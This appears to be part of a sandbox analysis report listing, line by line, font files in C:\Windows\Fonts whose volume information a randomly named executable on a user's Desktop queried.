          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
